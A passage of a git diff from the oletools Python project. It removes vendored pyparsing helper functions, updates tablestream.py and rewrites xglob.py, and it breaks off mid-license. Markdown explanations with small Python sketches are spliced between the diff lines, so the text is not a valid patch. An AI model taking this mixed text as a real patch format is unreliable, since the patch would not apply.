-def srange(s):
- r"""Helper to easily define string ranges for use in Word construction. Borrows
- syntax from regexp '[]' string range definitions::
- srange("[0-9]") -> "0123456789"
- srange("[a-z]") -> "abcdefghijklmnopqrstuvwxyz"
- srange("[a-z$_]") -> "abcdefghijklmnopqrstuvwxyz$_"
- The input string must be enclosed in []'s, and the returned string is the expanded
- character set joined into a single string.
- The values enclosed in the []'s may be::
- a single character
- an escaped character with a leading backslash (such as \- or \])
- an escaped hex character with a leading '\x' (\x21, which is a '!' character)
- (\0x## is also supported for backwards compatibility)
- an escaped octal character with a leading '\0' (\041, which is a '!' character)
- a range of any of the above, separated by a dash ('a-z', etc.)
- any combination of the above ('aeiouy', 'a-zA-Z0-9_$', etc.)
- """
- _expanded = lambda p: p if not isinstance(p,ParseResults) else ''.join(unichr(c) for c in range(ord(p[0]),ord(p[1])+1))
- try:
- return "".join(_expanded(part) for part in _reBracketExpr.parseString(s).body)
- except:
- return ""
-
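The range expansion that `srange` performs can be sketched without pyparsing. `expand_range` below is a hypothetical stdlib-only helper illustrating the core idea; it omits the escape forms (`\-`, `\x##`, `\0##`) that the real `srange` supports:

```python
def expand_range(spec):
    # Hypothetical stdlib-only sketch of srange's core idea: expand a
    # "[a-e0-3]"-style spec into the full character set. Escapes handled
    # by the real srange (\-, \x##, \0##) are omitted here.
    body = spec[1:-1]               # strip the enclosing []
    out = []
    i = 0
    while i < len(body):
        if i + 2 < len(body) and body[i + 1] == '-':
            # a dash between two chars: expand the inclusive range
            out.append(''.join(chr(c) for c in
                               range(ord(body[i]), ord(body[i + 2]) + 1)))
            i += 3
        else:
            out.append(body[i])     # single literal character
            i += 1
    return ''.join(out)

print(expand_range("[0-9]"))     # 0123456789
print(expand_range("[a-e$_]"))   # abcde$_
```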
-def matchOnlyAtCol(n):
- """Helper method for defining parse actions that require matching at a specific
- column in the input text.
- """
- def verifyCol(strg,locn,toks):
- if col(locn,strg) != n:
- raise ParseException(strg,locn,"matched token not at column %d" % n)
- return verifyCol
-
-def replaceWith(replStr):
- """Helper method for common parse actions that simply return a literal value. Especially
- useful when used with C{L{transformString}()}.
- """
- def _replFunc(*args):
- return [replStr]
- return _replFunc
-
-def removeQuotes(s,l,t):
- """Helper parse action for removing quotation marks from parsed quoted strings.
- To use, add this parse action to quoted string using::
- quotedString.setParseAction( removeQuotes )
- """
- return t[0][1:-1]
-
-def upcaseTokens(s,l,t):
- """Helper parse action to convert tokens to upper case."""
- return [ tt.upper() for tt in map(_ustr,t) ]
-
-def downcaseTokens(s,l,t):
- """Helper parse action to convert tokens to lower case."""
- return [ tt.lower() for tt in map(_ustr,t) ]
-
-def keepOriginalText(s,startLoc,t):
- """DEPRECATED - use new helper method C{L{originalTextFor}}.
- Helper parse action to preserve original parsed text,
- overriding any nested parse actions."""
- try:
- endloc = getTokensEndLoc()
- except ParseException:
- raise ParseFatalException("incorrect usage of keepOriginalText - may only be called as a parse action")
- del t[:]
- t += ParseResults(s[startLoc:endloc])
- return t
-
-def getTokensEndLoc():
- """Method to be called from within a parse action to determine the end
- location of the parsed tokens."""
- import inspect
- fstack = inspect.stack()
- try:
- # search up the stack (through intervening argument normalizers) for correct calling routine
- for f in fstack[2:]:
- if f[3] == "_parseNoCache":
- endloc = f[0].f_locals["loc"]
- return endloc
- else:
- raise ParseFatalException("incorrect usage of getTokensEndLoc - may only be called from within a parse action")
- finally:
- del fstack
-
-def _makeTags(tagStr, xml):
- """Internal helper to construct opening and closing tag expressions, given a tag name"""
- if isinstance(tagStr,basestring):
- resname = tagStr
- tagStr = Keyword(tagStr, caseless=not xml)
- else:
- resname = tagStr.name
-
- tagAttrName = Word(alphas,alphanums+"_-:")
- if (xml):
- tagAttrValue = dblQuotedString.copy().setParseAction( removeQuotes )
- openTag = Suppress("<") + tagStr("tag") + \
- Dict(ZeroOrMore(Group( tagAttrName + Suppress("=") + tagAttrValue ))) + \
- Optional("/",default=[False]).setResultsName("empty").setParseAction(lambda s,l,t:t[0]=='/') + Suppress(">")
- else:
- printablesLessRAbrack = "".join(c for c in printables if c not in ">")
- tagAttrValue = quotedString.copy().setParseAction( removeQuotes ) | Word(printablesLessRAbrack)
- openTag = Suppress("<") + tagStr("tag") + \
- Dict(ZeroOrMore(Group( tagAttrName.setParseAction(downcaseTokens) + \
- Optional( Suppress("=") + tagAttrValue ) ))) + \
- Optional("/",default=[False]).setResultsName("empty").setParseAction(lambda s,l,t:t[0]=='/') + Suppress(">")
- closeTag = Combine(_L("</") + tagStr + ">")
-
- openTag = openTag.setResultsName("start"+"".join(resname.replace(":"," ").title().split())).setName("<%s>" % tagStr)
- closeTag = closeTag.setResultsName("end"+"".join(resname.replace(":"," ").title().split())).setName("</%s>" % tagStr)
- openTag.tag = resname
- closeTag.tag = resname
- return openTag, closeTag
-
-def makeHTMLTags(tagStr):
- """Helper to construct opening and closing tag expressions for HTML, given a tag name"""
- return _makeTags( tagStr, False )
-
-def makeXMLTags(tagStr):
- """Helper to construct opening and closing tag expressions for XML, given a tag name"""
- return _makeTags( tagStr, True )
-
-def withAttribute(*args,**attrDict):
- """Helper to create a validating parse action to be used with start tags created
- with C{L{makeXMLTags}} or C{L{makeHTMLTags}}. Use C{withAttribute} to qualify a starting tag
- with a required attribute value, to avoid false matches on common tags such as
- C{<TD>} or C{<DIV>}.
-
- Call C{withAttribute} with a series of attribute names and values. Specify the list
- of filter attribute names and values as:
- - keyword arguments, as in C{(align="right")}, or
- - as an explicit dict with C{**} operator, when an attribute name is also a Python
- reserved word, as in C{**{"class":"Customer", "align":"right"}}
- - a list of name-value tuples, as in ( ("ns1:class", "Customer"), ("ns2:align","right") )
- For attribute names with a namespace prefix, you must use the second form. Attribute
- names are matched insensitive to upper/lower case.
-
- To verify that the attribute exists, but without specifying a value, pass
- C{withAttribute.ANY_VALUE} as the value.
- """
- if args:
- attrs = args[:]
- else:
- attrs = attrDict.items()
- attrs = [(k,v) for k,v in attrs]
- def pa(s,l,tokens):
- for attrName,attrValue in attrs:
- if attrName not in tokens:
- raise ParseException(s,l,"no matching attribute " + attrName)
- if attrValue != withAttribute.ANY_VALUE and tokens[attrName] != attrValue:
- raise ParseException(s,l,"attribute '%s' has value '%s', must be '%s'" %
- (attrName, tokens[attrName], attrValue))
- return pa
-withAttribute.ANY_VALUE = object()
-
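The validation that `withAttribute` attaches to a start tag can be sketched as a plain predicate over an attribute dict. This is a hypothetical stdlib-only analogue (names are illustrative, not pyparsing's API):

```python
ANY_VALUE = object()   # sentinel, like withAttribute.ANY_VALUE

def with_attribute(**attrs):
    # Hypothetical sketch of withAttribute's check: return a predicate that
    # accepts a tag's attribute dict only if every required name is present
    # and (unless ANY_VALUE) has the required value.
    def check(tag_attrs):
        for name, value in attrs.items():
            if name not in tag_attrs:
                return False
            if value is not ANY_VALUE and tag_attrs[name] != value:
                return False
        return True
    return check

accept = with_attribute(align='right')
print(accept({'align': 'right', 'class': 'x'}))   # True
print(accept({'align': 'left'}))                  # False
```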
-opAssoc = _Constants()
-opAssoc.LEFT = object()
-opAssoc.RIGHT = object()
-
-def infixNotation( baseExpr, opList, lpar=Suppress('('), rpar=Suppress(')') ):
- """Helper method for constructing grammars of expressions made up of
- operators working in a precedence hierarchy. Operators may be unary or
- binary, left- or right-associative. Parse actions can also be attached
- to operator expressions.
-
- Parameters:
- - baseExpr - expression representing the most basic element for the nested
- - opList - list of tuples, one for each operator precedence level in the
- expression grammar; each tuple is of the form
- (opExpr, numTerms, rightLeftAssoc, parseAction), where:
- - opExpr is the pyparsing expression for the operator;
- may also be a string, which will be converted to a Literal;
- if numTerms is 3, opExpr is a tuple of two expressions, for the
- two operators separating the 3 terms
- - numTerms is the number of terms for this operator (must
- be 1, 2, or 3)
- - rightLeftAssoc is the indicator whether the operator is
- right or left associative, using the pyparsing-defined
- constants C{opAssoc.RIGHT} and C{opAssoc.LEFT}.
- - parseAction is the parse action to be associated with
- expressions matching this operator expression (the
- parse action tuple member may be omitted)
- - lpar - expression for matching left-parentheses (default=Suppress('('))
- - rpar - expression for matching right-parentheses (default=Suppress(')'))
- """
- ret = Forward()
- lastExpr = baseExpr | ( lpar + ret + rpar )
- for i,operDef in enumerate(opList):
- opExpr,arity,rightLeftAssoc,pa = (operDef + (None,))[:4]
- if arity == 3:
- if opExpr is None or len(opExpr) != 2:
- raise ValueError("if numterms=3, opExpr must be a tuple or list of two expressions")
- opExpr1, opExpr2 = opExpr
- thisExpr = Forward()#.setName("expr%d" % i)
- if rightLeftAssoc == opAssoc.LEFT:
- if arity == 1:
- matchExpr = FollowedBy(lastExpr + opExpr) + Group( lastExpr + OneOrMore( opExpr ) )
- elif arity == 2:
- if opExpr is not None:
- matchExpr = FollowedBy(lastExpr + opExpr + lastExpr) + Group( lastExpr + OneOrMore( opExpr + lastExpr ) )
- else:
- matchExpr = FollowedBy(lastExpr+lastExpr) + Group( lastExpr + OneOrMore(lastExpr) )
- elif arity == 3:
- matchExpr = FollowedBy(lastExpr + opExpr1 + lastExpr + opExpr2 + lastExpr) + \
- Group( lastExpr + opExpr1 + lastExpr + opExpr2 + lastExpr )
- else:
- raise ValueError("operator must be unary (1), binary (2), or ternary (3)")
- elif rightLeftAssoc == opAssoc.RIGHT:
- if arity == 1:
- # try to avoid LR with this extra test
- if not isinstance(opExpr, Optional):
- opExpr = Optional(opExpr)
- matchExpr = FollowedBy(opExpr.expr + thisExpr) + Group( opExpr + thisExpr )
- elif arity == 2:
- if opExpr is not None:
- matchExpr = FollowedBy(lastExpr + opExpr + thisExpr) + Group( lastExpr + OneOrMore( opExpr + thisExpr ) )
- else:
- matchExpr = FollowedBy(lastExpr + thisExpr) + Group( lastExpr + OneOrMore( thisExpr ) )
- elif arity == 3:
- matchExpr = FollowedBy(lastExpr + opExpr1 + thisExpr + opExpr2 + thisExpr) + \
- Group( lastExpr + opExpr1 + thisExpr + opExpr2 + thisExpr )
- else:
- raise ValueError("operator must be unary (1), binary (2), or ternary (3)")
- else:
- raise ValueError("operator must indicate right or left associativity")
- if pa:
- matchExpr.setParseAction( pa )
- thisExpr <<= ( matchExpr | lastExpr )
- lastExpr = thisExpr
- ret <<= lastExpr
- return ret
-operatorPrecedence = infixNotation
-
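The layering that `infixNotation` builds as a grammar — each precedence level wrapping the next-tighter level, folding left-associatively — can be illustrated with a small stdlib-only evaluator. This is a hypothetical sketch of the idea, not pyparsing code:

```python
import re

# Hypothetical sketch of infixNotation's precedence layering: level 0 binds
# loosest, the last level binds tightest, and each level folds left-
# associatively over results of the next level (here applied to arithmetic).
OPS = {'+': lambda a, b: a + b, '-': lambda a, b: a - b,
       '*': lambda a, b: a * b, '/': lambda a, b: a / b}

def evaluate(expr):
    tokens = re.findall(r'\d+|[+\-*/]', expr)
    pos = [0]
    levels = (('+', '-'), ('*', '/'))

    def parse(level):
        if level == len(levels):
            tok = tokens[pos[0]]; pos[0] += 1
            return int(tok)                      # atom: an integer literal
        value = parse(level + 1)
        # left-associative fold over this precedence level
        while pos[0] < len(tokens) and tokens[pos[0]] in levels[level]:
            op = tokens[pos[0]]; pos[0] += 1
            value = OPS[op](value, parse(level + 1))
        return value

    return parse(0)

print(evaluate("2+3*4"))    # 14
print(evaluate("10-2-3"))   # 5
```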
-dblQuotedString = Regex(r'"(?:[^"\n\r\\]|(?:"")|(?:\\x[0-9a-fA-F]+)|(?:\\.))*"').setName("string enclosed in double quotes")
-sglQuotedString = Regex(r"'(?:[^'\n\r\\]|(?:'')|(?:\\x[0-9a-fA-F]+)|(?:\\.))*'").setName("string enclosed in single quotes")
-quotedString = Regex(r'''(?:"(?:[^"\n\r\\]|(?:"")|(?:\\x[0-9a-fA-F]+)|(?:\\.))*")|(?:'(?:[^'\n\r\\]|(?:'')|(?:\\x[0-9a-fA-F]+)|(?:\\.))*')''').setName("quotedString using single or double quotes")
-unicodeString = Combine(_L('u') + quotedString.copy())
-
-def nestedExpr(opener="(", closer=")", content=None, ignoreExpr=quotedString.copy()):
- """Helper method for defining nested lists enclosed in opening and closing
- delimiters ("(" and ")" are the default).
-
- Parameters:
- - opener - opening character for a nested list (default="("); can also be a pyparsing expression
- - closer - closing character for a nested list (default=")"); can also be a pyparsing expression
- - content - expression for items within the nested lists (default=None)
- - ignoreExpr - expression for ignoring opening and closing delimiters (default=quotedString)
-
- If an expression is not provided for the content argument, the nested
- expression will capture all whitespace-delimited content between delimiters
- as a list of separate values.
-
- Use the C{ignoreExpr} argument to define expressions that may contain
- opening or closing characters that should not be treated as opening
- or closing characters for nesting, such as quotedString or a comment
- expression. Specify multiple expressions using an C{L{Or}} or C{L{MatchFirst}}.
- The default is L{quotedString}, but if no expressions are to be ignored,
- then pass C{None} for this argument.
- """
- if opener == closer:
- raise ValueError("opening and closing strings cannot be the same")
- if content is None:
- if isinstance(opener,basestring) and isinstance(closer,basestring):
- if len(opener) == 1 and len(closer)==1:
- if ignoreExpr is not None:
- content = (Combine(OneOrMore(~ignoreExpr +
- CharsNotIn(opener+closer+ParserElement.DEFAULT_WHITE_CHARS,exact=1))
- ).setParseAction(lambda t:t[0].strip()))
- else:
- content = (empty.copy()+CharsNotIn(opener+closer+ParserElement.DEFAULT_WHITE_CHARS
- ).setParseAction(lambda t:t[0].strip()))
- else:
- if ignoreExpr is not None:
- content = (Combine(OneOrMore(~ignoreExpr +
- ~Literal(opener) + ~Literal(closer) +
- CharsNotIn(ParserElement.DEFAULT_WHITE_CHARS,exact=1))
- ).setParseAction(lambda t:t[0].strip()))
- else:
- content = (Combine(OneOrMore(~Literal(opener) + ~Literal(closer) +
- CharsNotIn(ParserElement.DEFAULT_WHITE_CHARS,exact=1))
- ).setParseAction(lambda t:t[0].strip()))
- else:
- raise ValueError("opening and closing arguments must be strings if no content expression is given")
- ret = Forward()
- if ignoreExpr is not None:
- ret <<= Group( Suppress(opener) + ZeroOrMore( ignoreExpr | ret | content ) + Suppress(closer) )
- else:
- ret <<= Group( Suppress(opener) + ZeroOrMore( ret | content ) + Suppress(closer) )
- return ret
-
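The tree-of-lists result that `nestedExpr` yields for delimiter-nested input can be sketched with a stack, stdlib only. A hypothetical illustration (fixed `(`/`)` delimiters, no `ignoreExpr`, no error handling for unbalanced input):

```python
import re

def parse_nested(s):
    # Hypothetical sketch of nestedExpr's result shape: one nested list per
    # parenthesized group, whitespace-separated words as leaves. Delimiters
    # are fixed to ( and ); unbalanced input is not detected.
    stack = [[]]
    for tok in re.findall(r'[()]|[^()\s]+', s):
        if tok == '(':
            stack.append([])            # open a new nesting level
        elif tok == ')':
            group = stack.pop()         # close it and attach to the parent
            stack[-1].append(group)
        else:
            stack[-1].append(tok)       # plain word
    return stack[0]

print(parse_nested("(a (b c) d)"))   # [['a', ['b', 'c'], 'd']]
```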
-def indentedBlock(blockStatementExpr, indentStack, indent=True):
- """Helper method for defining space-delimited indentation blocks, such as
- those used to define block statements in Python source code.
-
- Parameters:
- - blockStatementExpr - expression defining syntax of statement that
- is repeated within the indented block
- - indentStack - list created by caller to manage indentation stack
- (multiple statementWithIndentedBlock expressions within a single grammar
- should share a common indentStack)
- - indent - boolean indicating whether block must be indented beyond
- the current level; set to False for block of left-most statements
- (default=True)
-
- A valid block must contain at least one C{blockStatement}.
- """
- def checkPeerIndent(s,l,t):
- if l >= len(s): return
- curCol = col(l,s)
- if curCol != indentStack[-1]:
- if curCol > indentStack[-1]:
- raise ParseFatalException(s,l,"illegal nesting")
- raise ParseException(s,l,"not a peer entry")
-
- def checkSubIndent(s,l,t):
- curCol = col(l,s)
- if curCol > indentStack[-1]:
- indentStack.append( curCol )
- else:
- raise ParseException(s,l,"not a subentry")
-
- def checkUnindent(s,l,t):
- if l >= len(s): return
- curCol = col(l,s)
- if not(indentStack and curCol < indentStack[-1] and curCol <= indentStack[-2]):
- raise ParseException(s,l,"not an unindent")
- indentStack.pop()
-
- NL = OneOrMore(LineEnd().setWhitespaceChars("\t ").suppress())
- INDENT = Empty() + Empty().setParseAction(checkSubIndent)
- PEER = Empty().setParseAction(checkPeerIndent)
- UNDENT = Empty().setParseAction(checkUnindent)
- if indent:
- smExpr = Group( Optional(NL) +
- #~ FollowedBy(blockStatementExpr) +
- INDENT + (OneOrMore( PEER + Group(blockStatementExpr) + Optional(NL) )) + UNDENT)
- else:
- smExpr = Group( Optional(NL) +
- (OneOrMore( PEER + Group(blockStatementExpr) + Optional(NL) )) )
- blockStatementExpr.ignore(_bslash + LineEnd())
- return smExpr
-
-alphas8bit = srange(r"[\0xc0-\0xd6\0xd8-\0xf6\0xf8-\0xff]")
-punc8bit = srange(r"[\0xa1-\0xbf\0xd7\0xf7]")
-
-anyOpenTag,anyCloseTag = makeHTMLTags(Word(alphas,alphanums+"_:"))
-commonHTMLEntity = Combine(_L("&") + oneOf("gt lt amp nbsp quot").setResultsName("entity") +";").streamline()
-_htmlEntityMap = dict(zip("gt lt amp nbsp quot".split(),'><& "'))
-replaceHTMLEntity = lambda t : t.entity in _htmlEntityMap and _htmlEntityMap[t.entity] or None
-
-# it's easy to get these comment structures wrong - they're very common, so may as well make them available
-cStyleComment = Regex(r"/\*(?:[^*]*\*+)+?/").setName("C style comment")
-
- htmlComment = Regex(r"<!--[\s\S]*?-->")
-restOfLine = Regex(r".*").leaveWhitespace()
-dblSlashComment = Regex(r"\/\/(\\\n|.)*").setName("// comment")
- cppStyleComment = Regex(r"/(?:\*(?:[^*]*\*+)+?/|/[^\n]*(?:\n[^\n]*)*?(?:(?<!\\)|\Z))").setName("C++ style comment")
-
- javaStyleComment = cppStyleComment
- pythonStyleComment = Regex(r"#.*").setName("Python style comment")
- _commasepitem = Combine(OneOrMore(Word(printables, excludeChars=',') +
- Optional( Word(" \t") +
- ~Literal(",") + ~LineEnd() ) ) ).streamline().setName("commaItem")
- commaSeparatedList = delimitedList( Optional( quotedString.copy() | _commasepitem, default="") ).setName("commaSeparatedList")
-
-
- if __name__ == "__main__":
-
- def test( teststring ):
- try:
- tokens = simpleSQL.parseString( teststring )
- tokenlist = tokens.asList()
- print (teststring + "->" + str(tokenlist))
- print ("tokens = " + str(tokens))
- print ("tokens.columns = " + str(tokens.columns))
- print ("tokens.tables = " + str(tokens.tables))
- print (tokens.asXML("SQL",True))
- except ParseBaseException as err:
- print (teststring + "->")
- print (err.line)
- print (" "*(err.column-1) + "^")
- print (err)
- print()
-
- selectToken = CaselessLiteral( "select" )
- fromToken = CaselessLiteral( "from" )
-
- ident = Word( alphas, alphanums + "_$" )
- columnName = delimitedList( ident, ".", combine=True ).setParseAction( upcaseTokens )
- columnNameList = Group( delimitedList( columnName ) )#.setName("columns")
- tableName = delimitedList( ident, ".", combine=True ).setParseAction( upcaseTokens )
- tableNameList = Group( delimitedList( tableName ) )#.setName("tables")
- simpleSQL = ( selectToken + \
- ( '*' | columnNameList ).setResultsName( "columns" ) + \
- fromToken + \
- tableNameList.setResultsName( "tables" ) )
-
- test( "SELECT * from XYZZY, ABC" )
- test( "select * from SYS.XYZZY" )
- test( "Select A from Sys.dual" )
- test( "Select AA,BB,CC from Sys.dual" )
- test( "Select A, B, C from Sys.dual" )
- test( "Select A, B, C from Sys.dual" )
- test( "Xelect A, B, C from Sys.dual" )
- test( "Select A, B, C frox Sys.dual" )
- test( "Select" )
- test( "Select ^^^ frox Sys.dual" )
- test( "Select A, B, C from Sys.dual, Table2 " )
diff --git a/oletools/thirdparty/tablestream/tablestream.py b/oletools/thirdparty/tablestream/tablestream.py
index 3a7df4f1..cd5a9246 100644
--- a/oletools/thirdparty/tablestream/tablestream.py
+++ b/oletools/thirdparty/tablestream/tablestream.py
@@ -19,7 +19,7 @@
#=== LICENSE ==================================================================
-# tablestream is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info)
+# tablestream is copyright (c) 2015-2018 Philippe Lagadec (http://www.decalage.info)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
@@ -54,8 +54,10 @@
# 2016-07-31 v0.06 PL: - handle newline characters properly in each cell
# 2016-08-28 v0.07 PL: - support for both Python 2.6+ and 3.x
# - all cells are converted to unicode
+# 2018-09-22 v0.08 PL: - removed mention to oletools' thirdparty folder
+# 2019-03-27 v0.09 PL: - slight fix, TableStyleSlim inherits from TableStyle
-__version__ = '0.07'
+__version__ = '0.09'
#------------------------------------------------------------------------------
# TODO:
@@ -70,15 +72,6 @@
import textwrap
import sys, os
-# add the thirdparty subfolder to sys.path (absolute+normalized path):
-_thismodule_dir = os.path.normpath(os.path.abspath(os.path.dirname(__file__)))
-# print('_thismodule_dir = %r' % _thismodule_dir)
-# assumption: this module is in a subfolder of thirdparty:
-_thirdparty_dir = os.path.normpath(os.path.join(_thismodule_dir, '..'))
-# print('_thirdparty_dir = %r' % _thirdparty_dir)
-if not _thirdparty_dir in sys.path:
- sys.path.insert(0, _thirdparty_dir)
-
import colorclass
# On Windows, colorclass needs to be enabled:
@@ -182,7 +175,7 @@ class TableStyle(object):
bottom_right = u'+'
-class TableStyleSlim(object):
+class TableStyleSlim(TableStyle):
"""
Style for a TableStream.
Example:
diff --git a/oletools/thirdparty/xglob/xglob.py b/oletools/thirdparty/xglob/xglob.py
index d8f14ed6..c83cf90c 100644
--- a/oletools/thirdparty/xglob/xglob.py
+++ b/oletools/thirdparty/xglob/xglob.py
@@ -1,208 +1,214 @@
-#! /usr/bin/env python2
-"""
-xglob
-
-xglob is a python package to list files matching wildcards (*, ?, []),
-extending the functionality of the glob module from the standard python
-library (https://docs.python.org/2/library/glob.html).
-
-Main features:
-- recursive file listing (including subfolders)
-- file listing within Zip archives
-- helper function to open files specified as arguments, supporting files
- within zip archives encrypted with a password
-
-Author: Philippe Lagadec - http://www.decalage.info
-License: BSD, see source code or documentation
-
-For more info and updates: http://www.decalage.info/xglob
-"""
-
-# LICENSE:
-#
-# xglob is copyright (c) 2013-2016, Philippe Lagadec (http://www.decalage.info)
-# All rights reserved.
-#
-# Redistribution and use in source and binary forms, with or without modification,
-# are permitted provided that the following conditions are met:
-#
-# * Redistributions of source code must retain the above copyright notice, this
-# list of conditions and the following disclaimer.
-# * Redistributions in binary form must reproduce the above copyright notice,
-# this list of conditions and the following disclaimer in the documentation
-# and/or other materials provided with the distribution.
-#
-# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
-# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-
-#------------------------------------------------------------------------------
-# CHANGELOG:
-# 2013-12-04 v0.01 PL: - scan several files from command line args
-# 2014-01-14 v0.02 PL: - added riglob, ziglob
-# 2014-12-26 v0.03 PL: - moved code from balbuzard into a separate package
-# 2015-01-03 v0.04 PL: - fixed issues in iter_files + yield container name
-# 2016-02-24 v0.05 PL: - do not stop on exceptions, return them as data
-# - fixed issue when using wildcards with empty path
-# 2016-04-28 v0.06 CH: - improved handling of non-existing files
-# (by Christian Herdtweck)
-
-__version__ = '0.06'
-
-
-#=== IMPORTS =================================================================
-
-import os, fnmatch, glob, zipfile
-
-#=== EXCEPTIONS ==============================================================
-
-class PathNotFoundException(Exception):
- """ raised if given a fixed file/dir (not a glob) that does not exist """
- def __init__(self, path):
- super(PathNotFoundException, self).__init__(
- 'Given path does not exist: %r' % path)
-
-
-#=== FUNCTIONS ===============================================================
-
-# recursive glob function to find files in any subfolder:
-# inspired by http://stackoverflow.com/questions/14798220/how-can-i-search-sub-folders-using-glob-glob-module-in-python
-def rglob (path, pattern='*.*'):
- """
- Recursive glob:
- similar to glob.glob, but finds files recursively in all subfolders of path.
- path: root directory where to search files
- pattern: pattern for filenames, using wildcards, e.g. *.txt
- """
- #TODO: more compatible API with glob: use single param, split path from pattern
- return [os.path.join(dirpath, f)
- for dirpath, dirnames, files in os.walk(path)
- for f in fnmatch.filter(files, pattern)]
-
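The `os.walk` + `fnmatch` approach used by `rglob` above can be exercised end to end on a throwaway directory tree. A sketch assuming Python 3.2+ (for `tempfile.TemporaryDirectory`):

```python
import fnmatch
import os
import tempfile

# Build a small tree, then list *.txt files recursively the same way
# xglob.rglob does: os.walk over all subfolders, fnmatch on file names.
with tempfile.TemporaryDirectory() as root:
    os.makedirs(os.path.join(root, 'sub'))
    for name in ('a.txt', os.path.join('sub', 'b.txt'), os.path.join('sub', 'c.bin')):
        open(os.path.join(root, name), 'w').close()
    found = sorted(os.path.relpath(p, root)
                   for p in (os.path.join(d, f)
                             for d, _dirs, files in os.walk(root)
                             for f in fnmatch.filter(files, '*.txt')))
    print(found)   # a.txt and sub/b.txt, but not sub/c.bin
```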
-
-def riglob (pathname):
- """
- Recursive iglob:
- similar to glob.iglob, but finds files recursively in all subfolders of path.
- pathname: root directory where to search files followed by pattern for
- filenames, using wildcards, e.g. *.txt
- """
- path, filespec = os.path.split(pathname)
- # fix path if empty:
- if path == '':
- path = '.'
- # print 'riglob: path=%r, filespec=%r' % (path, filespec)
- for dirpath, dirnames, files in os.walk(path):
- for f in fnmatch.filter(files, filespec):
- yield os.path.join(dirpath, f)
-
-
-def ziglob (zipfileobj, pathname):
- """
- iglob in a zip:
- similar to glob.iglob, but finds files within a zip archive.
- - zipfileobj: zipfile.ZipFile object
- - pathname: root directory where to search files followed by pattern for
- filenames, using wildcards, e.g. *.txt
- """
- files = zipfileobj.namelist()
- #for f in files: print f
- for f in fnmatch.filter(files, pathname):
- yield f
-
-
-def iter_files(files, recursive=False, zip_password=None, zip_fname='*'):
- """
- Open each file provided as argument:
- - files is a list of arguments
- - if zip_password is None, each file is listed without reading its content.
- Wildcards are supported.
- - if not, then each file is opened as a zip archive with the provided password
- - then files matching zip_fname are opened from the zip archive
-
- Iterator: yields (container, filename, data) for each file. If zip_password is None, then
- only the filename is returned, container and data=None. Otherwise container is the
- filename of the container (zip file), and data is the file content (or an exception).
- If a given filename is not a glob and does not exist, the triplet
- (None, filename, PathNotFoundException) is yielded. (Globs matching nothing
- do not trigger exceptions)
- """
- #TODO: catch exceptions and yield them for the caller (no file found, file is not zip, wrong password, etc)
- #TODO: use logging instead of printing
- #TODO: split in two simpler functions, the caller knows if it's a zip or not
- # print 'iter_files: files=%r, recursive=%s' % (files, recursive)
- # choose recursive or non-recursive iglob:
- if recursive:
- iglob = riglob
- else:
- iglob = glob.iglob
- for filespec in files:
- if not is_glob(filespec) and not os.path.exists(filespec):
- yield None, filespec, PathNotFoundException(filespec)
- continue
- for filename in iglob(filespec):
- if zip_password is not None:
- # Each file is expected to be a zip archive:
- #print 'Opening zip archive %s with provided password' % filename
- z = zipfile.ZipFile(filename, 'r')
- #print 'Looking for file(s) matching "%s"' % zip_fname
- for subfilename in ziglob(z, zip_fname):
- #print 'Opening file in zip archive:', filename
- try:
- data = z.read(subfilename, zip_password)
- yield filename, subfilename, data
- except Exception as e:
- yield filename, subfilename, e
- z.close()
- else:
- # normal file
- # do not read the file content, just yield the filename
- yield None, filename, None
- #print 'Opening file', filename
- #data = open(filename, 'rb').read()
- #yield None, filename, data
-
-
-def is_glob(filespec):
- """ determine if given file specification is a single file name or a glob
-
- python's glob and fnmatch can only interpret ?, *, [list], and [ra-nge],
- (and combinations: hex_*_[A-Fabcdef0-9]).
- The special chars *?[-] can only be escaped using []
- --> file_name is not a glob
- --> file?name is a glob
- --> file* is a glob
- --> file[-._]name is a glob
- --> file[?]name is not a glob (matches literal "file?name")
- --> file[*]name is not a glob (matches literal "file*name")
- --> file[-]name is not a glob (matches literal "file-name")
- --> file-name is not a glob
-
- Also, obviously incorrect globs are treated as non-globs
- --> file[name is not a glob (matches literal "file[name")
- --> file]-[name is treated as a glob
- (it is not a valid glob but detecting errors like this requires
- sophisticated regular expression matching)
-
- Python's glob also works with globs in directory-part of path
- --> dir-part of path is analyzed just like filename-part
- --> thirdparty/*/xglob.py is a (valid) glob
-
- TODO: create a correct regexp to test for validity of ranges
- """
-
- # remove escaped special chars
- cleaned = filespec.replace('[*]', '').replace('[?]', '') \
- .replace('[[]', '').replace('[]]', '').replace('[-]', '')
-
- # check if special chars remain
- return '*' in cleaned or '?' in cleaned or \
- ('[' in cleaned and ']' in cleaned)
+#! /usr/bin/env python2
+"""
+xglob
+
+xglob is a python package to list files matching wildcards (*, ?, []),
+extending the functionality of the glob module from the standard python
+library (https://docs.python.org/2/library/glob.html).
+
+Main features:
+- recursive file listing (including subfolders)
+- file listing within Zip archives
+- helper function to open files specified as arguments, supporting files
+ within zip archives encrypted with a password
+
+Author: Philippe Lagadec - http://www.decalage.info
+License: BSD, see source code or documentation
+
+For more info and updates: http://www.decalage.info/xglob
+"""
+
+# LICENSE:
+#
+# xglob is copyright (c) 2013-2018, Philippe Lagadec (http://www.decalage.info)
+# All rights reserved.
+#
+# Redistribution and use in source and binary forms, with or without modification,
+# are permitted provided that the following conditions are met:
+#
+# * Redistributions of source code must retain the above copyright notice, this
+# list of conditions and the following disclaimer.
+# * Redistributions in binary form must reproduce the above copyright notice,
